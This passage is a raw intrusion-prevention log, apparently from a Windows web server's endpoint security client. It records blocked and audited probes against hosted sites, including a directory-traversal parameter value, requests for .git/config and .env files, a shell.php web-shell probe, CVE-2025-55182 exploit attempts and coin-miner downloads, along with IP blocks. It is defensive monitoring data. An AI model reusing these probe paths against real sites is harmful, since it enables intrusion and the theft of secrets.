00000215	01dc942b2170c783	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc942afabe7469	01dc942afabe7469	00000001	00000000	Active Response that started at 2/2/2026 4:52:02 PM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000212	01dc942b9ff3de57	000000cf	00000007	164a8367	56fb76d8	00000001	00000000	00000001	01dc942b9e5e8ded	01dc942d03ff49ed	00000001	00000000	The client will block traffic from IP address 216.118.251.86 for the next 600 seconds (from 2/2/2026 5:06:37 PM to 2/2/2026 5:16:37 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000211	01dc942bbde584e5	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc942bbd3ea281	01dc942d22df5e81	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/2/2026 5:07:29 PM to 2/2/2026 5:17:29 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003bf	01dc942bc48e40be	000000ce	0000000f	164a8367	56fb76d8	00000002	00000002	00000001	01dc942b9ddb6c72	01dc942b9ddb6c72	00000001	00000118	[SID: 34488] Audit: Generic Directory Traversal 10 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjlEREFDQjkzLTk0MkItMTFGMS05QjA0LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzQ0ODgsIm5hbWUiOiJBdWRpdDogR2VuZXJpYyBEaXJlY3RvcnkgVHJhdmVyc2FsIDEwIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000086b8	00010000	00000002	00000002	0000f2d7	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Generic Directory Traversal 10	http://www.thangnd.com/index/ajax/lang?lang=..//..//application/database			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bf	01dc942bc48e40be	000000ce	00000003	164a8367	56fb76d8	00000002	00000001	00000001	01dc942b9de03063	01dc942b9de03063	00000001	00000114	[SID: 34373] Attack: Malicious Scan Request 30 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjlEREFDQjkyLTk0MkItMTFGMS05QjA0LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzQzNzMsIm5hbWUiOiJBdHRhY2s6IE1hbGljaW91cyBTY2FuIFJlcXVlc3QgMzAiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00008645	00010000	00000002	00000002	0000f2d7	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Attack: Malicious Scan Request 30	http://www.thangnd.com/index/ajax/lang?lang=..//..//application/database			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000db9	01dc942be2820604	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc942bbc97baef	01dc942bbc97baef	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjM2NDgsInNlc3Npb25faWQiOjAsInN0YXJ0X3RpbWUiOjE3NzAwMjY4Mzk2NTQsInVpZCI6IjY1MUE4QUVDLTAwMUUtRjFGMS1COUVDLUUwRDBGNzg0MENCQiJ9LCJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoyfSwiZGV0ZWN0aW9uX3VpZCI6IkJDOTcyQTBFLTk0MkItMTFGMS05N0U4LTgwNkU2RjZFNjk2MyIsInBhcmVudCI6eyJjbWRfbGluZSI6IkM6XFxXSU5ET1dTXFxTeXNXT1c2NFxcaW5ldHNydlxcdzN3cC5leGUgLWFwIFwic3VqY29tLmNvbShkb21haW4pKDIuMCkocG9vbClcIiAtdiBcInYyLjBcIiAtbCBcIndlYmVuZ2luZTQuZGxsXCIgLWEgXFxcXC5cXHBpcGVcXGlpc2lwbTY5MDQ1MDE1LTMyMTQtNDU5Ni04MzU2LTBkMjI1YmNkYzBlMiAtaCBcIkM6XFxpbmV0cHViXFx0ZW1wXFxhcHBwb29sc1xcc3VqY29tLmNvbShkb21haW4pKDIuMCkocG9vbClcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpLmNvbmZpZ1wiIC13IFwiXCIgLW0gMCAtdCA1IC10YSAwIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJNaWNyb3NvZnQgQ29ycG9yYXRpb24iLCJjcmVhdGVkIjoxNjIwNDYxNzYyMTkxLCJmb2xkZXIiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXCIsIm1kNSI6IjNEMjcyNTc0RjM3OEJBMDZGRDJCODVDQjc3OUMwM0FBIiwibmFtZSI6Inczd3AuZXhlIiwicGF0aCI6ImM6XFx3aW5kb3dzXFxzeXN3b3c2NFxcaW5ldHNydlxcdzN3cC5leGUiLCJwcm9kdWN0X25hbWUiOiJJbnRlcm5ldCBJbmZvcm1hdGlvbiBTZXJ2aWNlcyIsInNoYTEiOiIxOTE3RjY5RUQyNjBFNTEzMTAxNUY5QTVENzIxMUFGNzBGMEVBNTNCIiwic2hhMiI6IkE0RTFBNUIxNDg5QjMxNjA2NEYwODNDNENEN0JGQzgzQjcwRUU0Njg0QTREOTdEMUFEMUM0RTZENjQ4MTYxQTMiLCJzaWduYXR1cmVfY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwic2lnbmF0dXJlX2NyZWF0ZWRfZGF0ZSI6MTc0ODM1ODU0MDAwMCwic2lnbmF0dXJlX2lzc3VlciI6Ik1pY3Jvc29mdCBXaW5kb3dzIFByb2R1Y3Rpb24gUENBIDIwMTEiLCJzaWduYXR1cmVfdmFsdWUiOjEwOTk1MjA3NzQxOTksInNpZ25hdHVyZV92YWx1ZV9pZHMiOlsxLDIsMyw1LDYsMTMsMTYsMTcsMTgsMjBdLCJ2ZXJzaW9uIjoiMTAuMC4yMDM0OC4xIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQ1MTA0LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDI2ODM4ODMyLCJ1aWQiOiI2NTFBOEFFOS0wMDFFLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwicmVtZWRpYXRlZCI6dHJ1ZSwidGhyZWF0Ijp7ImlkIjozMTkwOCwibmFtZSI6IldlYiBBdHRhY2s6IEpTQ29pbm1pbmVyIERvd25sb2FkIDEwOCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000e480	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770026844.2239599227905273437500			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
000003b4	01dc942c1465cb63	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc942bf03dbc41	01dc942bf03dbc41	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkYwM0NFODFFLTk0MkItMTFGMS1CRDkyLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000dac4	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://admin.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a8	01dc942c42fbd4a3	000000ce	0000000f	164a8367	eea0ecc0	00000002	00000002	00000001	01dc942c1e70109f	01dc942c1e70109f	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjFFNkQ4OTQwLTk0MkMtMTFGMS1BRUYxLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000a6a8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://www.musiclandvietnam.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000039e	01dc942c74e49094	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc942c4df649fc	01dc942c4df649fc	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjRERjMyMzg1LTk0MkMtMTFGMS05MkUwLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000a7a8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://th-ecotech.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000216	01dc942d28b203c8	000000d3	0000000f	164a8367	56fb76d8	00000001	00000000	00000000	01dc942d0403159b	01dc942d0403159b	00000001	00000000	Active Response that started at 2/2/2026 5:06:37 PM is disengaged. The traffic from IP address 216.118.251.86 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000215	01dc942d49ee2590	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc942d22e704c1	01dc942d22e704c1	00000001	00000000	Active Response that started at 2/2/2026 5:07:29 PM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003b0	01dc942f1b7a154d	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc942ef6a053e4	01dc942ef6a053e4	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkY2OUZCMkY1LTk0MkUtMTFGMS1CMDVELTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000d270	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://a.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b3	01dc9430403ce889	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc94301976d7e2	01dc94301976d7e2	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjE5NzVFQjcwLTk0MzAtMTFGMS1CQTU5LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	00008d04	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://blog.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b7	01dc94306ec42449	000000ce	0000000f	164a8367	e1870a72	00000002	00000002	00000001	01dc943049335914	01dc943049335914	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjQ5MzJCODIxLTk0MzAtMTFGMS1BRTVGLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000e69c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://fordlongan2s.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b4	01dc9430756f408c	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc9430508ee869	01dc9430508ee869	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjUwOEU2Nzc1LTk0MzAtMTFGMS1BMzc1LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000b16c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://blogs.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b8	01dc9430935f4507	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc94306f8ecd1c	01dc94306f8ecd1c	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjZGOEVCOEU3LTk0MzAtMTFGMS05RTc1LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000eae0	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://bookmarks.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000384	01dc943150cd5d09	000000ce	0000000f	164a8367	82c9be04	00000002	00000002	00000001	01dc94312cd262ed	01dc94312cd262ed	00000001	00000114	[SID: 33355] Audit: WebShell Access Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjJDRDIzRUI1LTk0MzEtMTFGMS04RkQ3LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzNTUsIm5hbWUiOiJBdWRpdDogV2ViU2hlbGwgQWNjZXNzIEF0dGVtcHQgMiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000824b	00010000	00000002	00000002	000017bd	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: WebShell Access Attempt 2	http://pct.com.vn/shell.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000213	01dc94321831af21	000000cf	00000007	164a8367	d1938ec1	00000001	00000000	00000001	01dc943216ad0e4f	01dc94337c4dca4f	00000001	00000000	The client will block traffic from IP address 193.142.147.209 for the next 600 seconds (from 2/2/2026 5:52:56 PM to 2/2/2026 6:02:56 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000403	01dc94323cf0cef6	000000ce	00000003	164a8367	d1938ec1	00000002	00000001	00000001	01dc94321629ec28	01dc94321629ec28	00000001	00000158	[SID: 35300] Web Attack: Meta React Server Components CVE-2025-55182 2 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjE2MjZCOUJELTk0MzItMTFGMS1BMUI0LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJjdmVfdWlkIjoiQ1ZFLTIwMjUtNTUxODIiLCJpZCI6MzUzMDAsIm5hbWUiOiJXZWIgQXR0YWNrOiBNZXRhIFJlYWN0IFNlcnZlciBDb21wb25lbnRzIENWRS0yMDI1LTU1MTgyIDIiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000089e4	00010000	00000002	00000002	0000e7e2	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Meta React Server Components CVE-2025-55182 2	http://103.131.74.22:80/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003fb	01dc94323cf0cef6	000000ce	00000003	164a8367	d1938ec1	00000002	00000001	00000001	01dc9432162eb2fc	01dc9432162eb2fc	00000001	00000154	[SID: 35256] Web Attack: Meta React Server Components CVE-2025-55182 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjE2MjZCOUJDLTk0MzItMTFGMS1BMUI0LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJjdmVfdWlkIjoiQ1ZFLTIwMjUtNTUxODIiLCJpZCI6MzUyNTYsIm5hbWUiOiJXZWIgQXR0YWNrOiBNZXRhIFJlYWN0IFNlcnZlciBDb21wb25lbnRzIENWRS0yMDI1LTU1MTgyIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000089b8	00010001	00000002	00000002	0000e7e2	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Meta React Server Components CVE-2025-55182	http://103.131.74.22:80/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a3	01dc94323cf0cef6	000000ce	00000003	164a8367	d1938ec1	00000002	00000001	00000001	01dc94321635d7e9	01dc94321635d7e9	00000001	0000011c	[SID: 35273] Web Attack: Malicious Payload Upload 40 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjE2MjZCOUJCLTk0MzItMTFGMS1BMUI0LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzUyNzMsIm5hbWUiOiJXZWIgQXR0YWNrOiBNYWxpY2lvdXMgUGF5bG9hZCBVcGxvYWQgNDAiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000089c9	00010002	00000002	00000002	0000e7e2	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Malicious Payload Upload 40	http://103.131.74.22:80/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000217	01dc9433a07d0e68	000000d3	0000000f	164a8367	d1938ec1	00000001	00000000	00000000	01dc94337c86449b	01dc94337c86449b	00000001	00000000	Active Response that started at 2/2/2026 5:52:56 PM is disengaged. The traffic from IP address 193.142.147.209 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000211	01dc94346497c34f	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc943461dac65d	01dc9435c77b825d	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/2/2026 6:09:21 PM to 2/2/2026 6:19:21 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc943485d33181	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc943461c2eedf	01dc943461c2eedf	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjI1NDQ0LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDMwMDIzMDgzLCJ1aWQiOiJGRjg3NDIzOC0wMDI1LUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiI2MUJGREI5My05NDM0LTExRjEtQjYyOC04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG03OTNlM2JlNS1hY2EyLTRmOTEtOWE1MS01MTYzYjg1ZjI0NGIgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3l